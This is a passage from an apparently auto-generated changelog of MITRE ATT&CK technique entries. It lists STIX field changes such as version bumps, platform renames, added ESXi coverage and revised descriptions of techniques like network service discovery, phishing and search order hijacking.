[T1059.008] Command and Scripting Interpreter: Network Device CLI
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_remote_support | True | |
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2022-04-19 20:28:09.848000+00:00 | 2025-04-16 20:37:18.015000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 1.1 | 1.2 |
x_mitre_platforms[0] | Network | Network Devices |
[T1602.002] Data from Configuration Repository: Network Device Configuration Dump
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value
---|---|---
x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_permissions_required | ['Administrator'] | |
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2022-02-17 19:50:46.948000+00:00 | 2025-04-15 19:58:31.045000+00:00 |
x_mitre_version | 1.0 | 1.1 |
x_mitre_platforms[0] | Network | Network Devices |
[T1046] Network Service Discovery
Current version: 3.2
Version changed from: 3.1 → 3.2
Details
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2023-08-11 21:10:09.547000+00:00 | 2025-04-15 19:59:15.945000+00:00 |
description | Adversaries may attempt to get a listing of services running on remote hosts and local network infrastructure devices, including those that may be vulnerable to remote software exploitation. Common methods to acquire this information include port and/or vulnerability scans using tools that are brought onto a system.(Citation: CISA AR21-126A FIVEHANDS May 2021)
Within cloud environments, adversaries may attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems as well.
Within macOS environments, adversaries may use the native Bonjour application to discover services running on other macOS hosts within a network. The Bonjour mDNSResponder daemon automatically registers and advertises a host’s registered services on the network. For example, adversaries can use a mDNS query (such as dns-sd -B _ssh._tcp . ) to find other systems broadcasting the ssh service.(Citation: apple doco bonjour description)(Citation: macOS APT Activity Bradley) | Adversaries may attempt to get a listing of services running on remote hosts and local network infrastructure devices, including those that may be vulnerable to remote software exploitation. Common methods to acquire this information include port, vulnerability, and/or wordlist scans using tools that are brought onto a system.(Citation: CISA AR21-126A FIVEHANDS May 2021)
Within cloud environments, adversaries may attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems as well.
Within macOS environments, adversaries may use the native Bonjour application to discover services running on other macOS hosts within a network. The Bonjour mDNSResponder daemon automatically registers and advertises a host’s registered services on the network. For example, adversaries can use a mDNS query (such as dns-sd -B _ssh._tcp . ) to find other systems broadcasting the ssh service.(Citation: apple doco bonjour description)(Citation: macOS APT Activity Bradley) |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 3.1 | 3.2 |
x_mitre_platforms[5] | Network | Network Devices |
iterable_item_added
STIX Field | Old value | New Value
---|---|---
x_mitre_contributors | | Aaron Sullivan aka ZerkerEOD |
[T1070.005] Indicator Removal: Network Share Connection Removal
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_defense_bypassed | ['Host forensic analysis'] | |
x_mitre_system_requirements | ['Established network share connection to a remote system. Level of access depends on permissions of the account used.'] | |
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2023-04-13 17:15:56.948000+00:00 | 2025-04-16 20:37:18.727000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.1 | 1.2 |
[T1040] Network Sniffing
Current version: 1.7
Version changed from: 1.6 → 1.7
Details
dictionary_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_system_requirements | ['Network interface access and packet capture driver'] | |
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2024-10-15 15:11:55.217000+00:00 | 2025-04-15 19:58:19.739000+00:00 |
x_mitre_version | 1.6 | 1.7 |
x_mitre_platforms[3] | Network | Network Devices |
[T1095] Non-Application Layer Protocol
Current version: 2.4
Version changed from: 2.3 → 2.4
New Mitigations:
Details
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2023-09-29 21:07:31.570000+00:00 | 2025-04-15 19:59:04.779000+00:00 |
description | Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.(Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
ICMP communication between hosts is one example.(Citation: Cisco Synful Knock Evolution) Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts.(Citation: Microsoft ICMP) However, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications. | Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.(Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
ICMP communication between hosts is one example.(Citation: Cisco Synful Knock Evolution) Because ICMP is part of the Internet Protocol Suite, it is required to be implemented by all IP-compatible hosts.(Citation: Microsoft ICMP) However, it is not as commonly monitored as other Internet Protocols such as TCP or UDP and may be used by adversaries to hide communications.
In ESXi environments, adversaries may leverage the Virtual Machine Communication Interface (VMCI) for communication between guest virtual machines and the ESXi host. This traffic is similar to client-server communications on traditional network sockets but is localized to the physical machine running the ESXi host, meaning it does not traverse external networks (routers, switches). This results in communications that are invisible to external monitoring and standard networking tools like tcpdump, netstat, nmap, and Wireshark. By adding a VMCI backdoor to a compromised ESXi host, adversaries may persistently regain access from any guest VM to the compromised ESXi host’s backdoor, regardless of network segmentation or firewall rules in place.(Citation: Google Cloud Threat Intelligence VMWare ESXi Zero-Day 2023) |
x_mitre_version | 2.3 | 2.4 |
x_mitre_platforms[3] | Network | Network Devices |
iterable_item_added
STIX Field | Old value | New Value
---|---|---
external_references | | {'source_name': 'Google Cloud Threat Intelligence VMWare ESXi Zero-Day 2023', 'description': 'Alexander Marvi, Brad Slaybaugh, Ron Craft, and Rufus Brown. (2023, June 13). VMware ESXi Zero-Day Used by Chinese Espionage Actor to Perform Privileged Guest Operations on Compromised Hypervisors. Retrieved March 26, 2025.', 'url': 'https://cloud.google.com/blog/topics/threat-intelligence/vmware-esxi-zero-day-bypass/'} |
x_mitre_platforms | | ESXi |
[T1132.002] Data Encoding: Non-Standard Encoding
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value
---|---|---
x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_permissions_required | ['User'] | |
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2020-03-14 23:39:50.117000+00:00 | 2025-04-15 19:59:11.823000+00:00 |
x_mitre_version | 1.0 | 1.1 |
iterable_item_added
STIX Field | Old value | New Value
---|---|---
x_mitre_platforms | | ESXi |
[T1571] Non-Standard Port
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2024-09-12 19:37:57.868000+00:00 | 2025-04-15 19:58:58.463000+00:00 |
x_mitre_version | 1.1 | 1.2 |
iterable_item_added
STIX Field | Old value | New Value
---|---|---
x_mitre_platforms | | ESXi |
[T1027] Obfuscated Files or Information
Current version: 1.7
Version changed from: 1.6 → 1.7
Details
dictionary_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_defense_bypassed | ['Host Forensic Analysis', 'Signature-based Detection', 'Host Intrusion Prevention Systems', 'Application Control', 'Log Analysis'] | |
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2024-04-16 12:27:18.945000+00:00 | 2025-04-15 19:58:59.251000+00:00 |
external_references[4]['description'] | Bohannon, D. & Holmes, L. (2017, July 27). Revoke-Obfuscation: PowerShell Obfuscation Detection Using Science. Retrieved February 12, 2018. | Bohannon, D. & Holmes, L. (2017, July 27). Revoke-Obfuscation: PowerShell Obfuscation Detection Using Science. Retrieved November 17, 2024. |
external_references[4]['url'] | https://www.fireeye.com/content/dam/fireeye-www/blog/pdfs/revoke-obfuscation-report.pdf | https://www.blackhat.com/docs/us-17/thursday/us-17-Bohannon-Revoke-Obfuscation-PowerShell-Obfuscation-Detection-And%20Evasion-Using-Science-wp.pdf |
x_mitre_version | 1.6 | 1.7 |
x_mitre_platforms[3] | Network | Network Devices |
iterable_item_added
STIX Field | Old value | New Value
---|---|---
x_mitre_platforms | | ESXi |
[T1218.008] System Binary Proxy Execution: Odbcconf
Current version: 2.1
Version changed from: 2.0 → 2.1
Details
dictionary_item_added
STIX Field | Old value | New Value
---|---|---
x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_defense_bypassed | ['Digital Certificate Validation', 'Application control'] | |
x_mitre_permissions_required | ['User'] | |
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2022-03-11 18:52:49.877000+00:00 | 2025-04-15 19:58:39.912000+00:00 |
x_mitre_version | 2.0 | 2.1 |
[T1102.003] Web Service: One-Way Communication
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value
---|---|---
x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_permissions_required | ['User'] | |
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2020-03-26 23:26:10.109000+00:00 | 2025-04-15 19:58:53.389000+00:00 |
x_mitre_version | 1.0 | 1.1 |
iterable_item_added
STIX Field | Old value | New Value
---|---|---
x_mitre_platforms | | ESXi |
[T1134.004] Access Token Manipulation: Parent PID Spoofing
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_defense_bypassed | ['Heuristic Detection', 'Host Forensic Analysis'] | |
x_mitre_permissions_required | ['User', 'Administrator'] | |
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2022-05-03 02:15:42.360000+00:00 | 2025-04-16 20:37:18.203000+00:00 |
x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
x_mitre_version | 1.0 | 1.1 |
[T1550.002] Use Alternate Authentication Material: Pass the Hash
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_defense_bypassed | ['System Access Controls'] | |
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2023-07-28 18:24:16.246000+00:00 | 2025-04-16 20:37:22.508000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.2 | 1.3 |
[T1550.003] Use Alternate Authentication Material: Pass the Ticket
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_defense_bypassed | ['System Access Controls'] | |
x_mitre_system_requirements | ['Kerberos authentication enabled'] | |
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2024-09-12 15:21:09.330000+00:00 | 2025-04-15 19:58:43.927000+00:00 |
external_references[2]['description'] | Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December 4, 2014. | Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved November 17, 2024. |
external_references[2]['url'] | http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf | https://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf |
x_mitre_version | 1.1 | 1.2 |
[T1110.002] Brute Force: Password Cracking
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-15 19:58:11.912000+00:00 |
x_mitre_version | 1.3 | 1.4 |
x_mitre_platforms[3] | Network | Network Devices |
[T1110.001] Brute Force: Password Guessing
Current version: 1.7
Version changed from: 1.6 → 1.7
Details
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-15 19:58:04.272000+00:00 |
x_mitre_version | 1.6 | 1.7 |
x_mitre_platforms[6] | Network | Network Devices |
iterable_item_added
STIX Field | Old value | New Value
---|---|---
x_mitre_platforms | | ESXi |
[T1201] Password Policy Discovery
Current version: 1.7
Version changed from: 1.6 → 1.7
Details
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2024-10-15 16:02:44.477000+00:00 | 2025-04-15 19:59:00.168000+00:00 |
x_mitre_version | 1.6 | 1.7 |
x_mitre_platforms[4] | Network | Network Devices |
[T1110.003] Brute Force: Password Spraying
Current version: 1.7
Version changed from: 1.6 → 1.7
Details
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2024-10-14 22:11:30.271000+00:00 | 2025-04-15 19:58:38.420000+00:00 |
x_mitre_version | 1.6 | 1.7 |
iterable_item_added
STIX Field | Old value | New Value
---|---|---
x_mitre_platforms | | Network Devices |
x_mitre_platforms | | ESXi |
iterable_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_platforms | Network | |
[T1601.001] Modify System Image: Patch System Image
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value
---|---|---
x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_permissions_required | ['Administrator'] | |
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2020-10-22 17:50:46.560000+00:00 | 2025-04-15 19:59:10.610000+00:00 |
x_mitre_version | 1.0 | 1.1 |
x_mitre_platforms[0] | Network | Network Devices |
[T1574.007] Hijack Execution Flow: Path Interception by PATH Environment Variable
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed
STIX Field | Old value | New Value
---|---|---
x_mitre_defense_bypassed | ['Application Control'] | |
values_changed
STIX Field | Old value | New Value
---|---|---
modified | 2023-10-03 03:29:57.078000+00:00 | 2025-04-15 19:58:05.096000+00:00 |
x_mitre_version | 1.1 | 1.2 |
[T1574.008] Hijack Execution Flow: Path Interception by Search Order Hijacking
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_effective_permissions | ['Administrator', 'SYSTEM', 'User'] | |
x_mitre_permissions_required | ['Administrator', 'User', 'SYSTEM'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-09-12 15:25:57.059000+00:00 | 2025-04-15 19:58:33.873000+00:00 |
description | Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. Unlike [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), the search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Windows NT Command Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory.
For example, "example.exe" runs "cmd.exe" with the command-line argument net user . An adversary may place a program called "net.exe" within the same directory as example.exe, "net.exe" will be run instead of the Windows system utility net. In addition, if an adversary places a program called "net.com" in the same directory as "net.exe", then cmd.exe /C net user will execute "net.com" instead of "net.exe" due to the order of executable extensions defined under PATHEXT. (Citation: Microsoft Environment Property)
Search order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001). | Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. Unlike [DLL](https://attack.mitre.org/techniques/T1574/001) search order hijacking, the search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Windows NT Command Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory.
For example, "example.exe" runs "cmd.exe" with the command-line argument net user . An adversary may place a program called "net.exe" within the same directory as example.exe, "net.exe" will be run instead of the Windows system utility net. In addition, if an adversary places a program called "net.com" in the same directory as "net.exe", then cmd.exe /C net user will execute "net.com" instead of "net.exe" due to the order of executable extensions defined under PATHEXT. (Citation: Microsoft Environment Property)
Search order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL](https://attack.mitre.org/techniques/T1574/001). |
x_mitre_version | 1.0 | 1.1 |
[T1120] Peripheral Device Discovery
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['User', 'Administrator', 'SYSTEM'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-30 21:01:41.575000+00:00 | 2025-04-16 20:37:16.397000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.3 | 1.4 |
[T1566] Phishing
Current version: 2.7
Version changed from: 2.6 → 2.7
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-07 15:00:19.668000+00:00 | 2025-04-15 19:58:55.739000+00:00 |
description | Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.
Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source, as well as evasive techniques such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014) Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof) the identity of the sender which can be used to fool both the human recipient as well as automated security tools,(Citation: cyberproof-double-bounce) or by including the intended target as a party to an existing email thread that includes malicious files or links (i.e., "thread hijacking").(Citation: phishing-krebs)
Victims may also receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools onto their computer (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: Unit42 Luna Moth) | Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns.
Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source, as well as evasive techniques such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014) Another way to accomplish this is by [Email Spoofing](https://attack.mitre.org/techniques/T1672)(Citation: Proofpoint-spoof) the identity of the sender, which can be used to fool both the human recipient as well as automated security tools,(Citation: cyberproof-double-bounce) or by including the intended target as a party to an existing email thread that includes malicious files or links (i.e., "thread hijacking").(Citation: phishing-krebs)
Victims may also receive phishing messages that instruct them to call a phone number where they are directed to visit a malicious URL, download malware,(Citation: sygnia Luna Month)(Citation: CISA Remote Monitoring and Management Software) or install adversary-accessible remote management tools onto their computer (i.e., [User Execution](https://attack.mitre.org/techniques/T1204)).(Citation: Unit42 Luna Moth) |
external_references[1]['description'] | Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020. | Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved November 17, 2024. |
x_mitre_version | 2.6 | 2.7 |
[T1598] Phishing for Information
Current version: 1.4
Version changed from: 1.3 → 1.4
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-05-31 04:18:44.570000+00:00 | 2025-04-15 19:59:08.689000+00:00 |
description | Adversaries may send phishing messages to elicit sensitive information that can be used during targeting. Phishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Phishing for information is different from [Phishing](https://attack.mitre.org/techniques/T1566) in that the objective is gathering data from the victim rather than executing malicious code.
All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass credential harvesting campaigns.
Adversaries may also try to obtain information directly through the exchange of emails, instant messages, or other electronic conversation means.(Citation: ThreatPost Social Media Phishing)(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin)(Citation: Sophos Attachment)(Citation: GitHub Phishery) Victims may also receive phishing messages that direct them to call a phone number where the adversary attempts to collect confidential information.(Citation: Avertium callback phishing)
Phishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages. Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof) the identity of the sender which can be used to fool both the human recipient as well as automated security tools.(Citation: cyberproof-double-bounce)
Phishing for information may also involve evasive techniques, such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014) | Adversaries may send phishing messages to elicit sensitive information that can be used during targeting. Phishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Phishing for information is different from [Phishing](https://attack.mitre.org/techniques/T1566) in that the objective is gathering data from the victim rather than executing malicious code.
All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass credential harvesting campaigns.
Adversaries may also try to obtain information directly through the exchange of emails, instant messages, or other electronic conversation means.(Citation: ThreatPost Social Media Phishing)(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin)(Citation: Sophos Attachment)(Citation: GitHub Phishery) Victims may also receive phishing messages that direct them to call a phone number where the adversary attempts to collect confidential information.(Citation: Avertium callback phishing)
Phishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages. Another way to accomplish this is by [Email Spoofing](https://attack.mitre.org/techniques/T1672)(Citation: Proofpoint-spoof) the identity of the sender, which can be used to fool both the human recipient as well as automated security tools.(Citation: cyberproof-double-bounce)
Phishing for information may also involve evasive techniques, such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014) |
external_references[1]['description'] | Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020. | Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved November 17, 2024. |
x_mitre_version | 1.3 | 1.4 |
[T1027.014] Obfuscated Files or Information: Polymorphic Code
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Signature-based Detection'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-09 18:56:28.092000+00:00 | 2025-04-15 19:59:00.006000+00:00 |
x_mitre_version | 1.0 | 1.1 |
[T1205.001] Traffic Signaling: Port Knocking
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['User'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2022-03-11 18:31:23.996000+00:00 | 2025-04-15 19:58:49.044000+00:00 |
x_mitre_version | 1.1 | 1.2 |
x_mitre_platforms[3] | Network | Network Devices |
[T1547.010] Boot or Logon Autostart Execution: Port Monitors
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_effective_permissions | ['SYSTEM'] | |
x_mitre_permissions_required | ['SYSTEM', 'Administrator'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-09-12 15:26:17.886000+00:00 | 2025-04-15 19:58:26.452000+00:00 |
x_mitre_version | 1.2 | 1.3 |
[T1055.002] Process Injection: Portable Executable Injection
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Anti-virus', 'Application control'] | |
x_mitre_permissions_required | ['User'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2021-10-18 12:21:11.178000+00:00 | 2025-04-15 19:58:46.232000+00:00 |
x_mitre_version | 1.1 | 1.2 |
[T1653] Power Settings
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-16 20:11:40.334000+00:00 | 2025-04-15 19:59:18.299000+00:00 |
x_mitre_version | 1.0 | 1.1 |
x_mitre_platforms[3] | Network | Network Devices |
[T1059.001] Command and Scripting Interpreter: PowerShell
Current version: 1.5
Version changed from: 1.4 → 1.5
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_remote_support | True | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-15 16:39:13.228000+00:00 | 2025-04-15 19:58:52.378000+00:00 |
x_mitre_version | 1.4 | 1.5 |
[T1546.013] Event Triggered Execution: PowerShell Profile
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['User', 'Administrator'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-20 17:04:13.976000+00:00 | 2025-04-15 19:58:06.292000+00:00 |
x_mitre_version | 1.1 | 1.2 |
[T1542] Pre-OS Boot
Current version: 1.3
Version changed from: 1.2 → 1.3
New Detections:
- DS0022: File (File Creation)
- DS0022: File (File Modification)
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_defense_bypassed | ['Anti-virus', 'Host intrusion prevention systems', 'File monitoring'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-02-26 14:26:14.364000+00:00 | 2025-04-15 19:58:45.876000+00:00 |
external_references[1]['description'] | Pinola, M. (2014, December 14). 3 tools to check your hard drive's health and make sure it's not already dying on you. Retrieved October 2, 2018. | Pinola, M. (2014, December 14). 3 tools to check your hard drive's health and make sure it's not already dying on you. Retrieved November 17, 2024. |
external_references[1]['url'] | https://www.itworld.com/article/2853992/3-tools-to-check-your-hard-drives-health-and-make-sure-its-not-already-dying-on-you.html | https://www.computerworld.com/article/1484887/3-tools-to-check-your-hard-drives-health-and-make-sure-its-not-already-dying-on-you.html |
x_mitre_version | 1.2 | 1.3 |
iterable_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_data_sources | | File: File Modification |
x_mitre_data_sources | | File: File Creation |
x_mitre_platforms | | Network Devices |
iterable_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_platforms | Network | |
[T1547.012] Boot or Logon Autostart Execution: Print Processors
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
x_mitre_permissions_required | ['Administrator', 'SYSTEM'] | |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-10-04 14:16:17.655000+00:00 | 2025-04-15 19:58:17.860000+00:00 |
x_mitre_version | 1.1 | 1.2 |
[T1552.004] Unsecured Credentials: Private Keys
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-04 11:31:56.622000+00:00 | 2025-04-15 19:58:35.201000+00:00 |
x_mitre_version | 1.2 | 1.3 |
x_mitre_platforms[3] | Network | Network Devices |
[T1055.009] Process Injection: Proc Memory
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
dictionary_item_removed
STIX Field | Old value | New Value |
---|---|---|
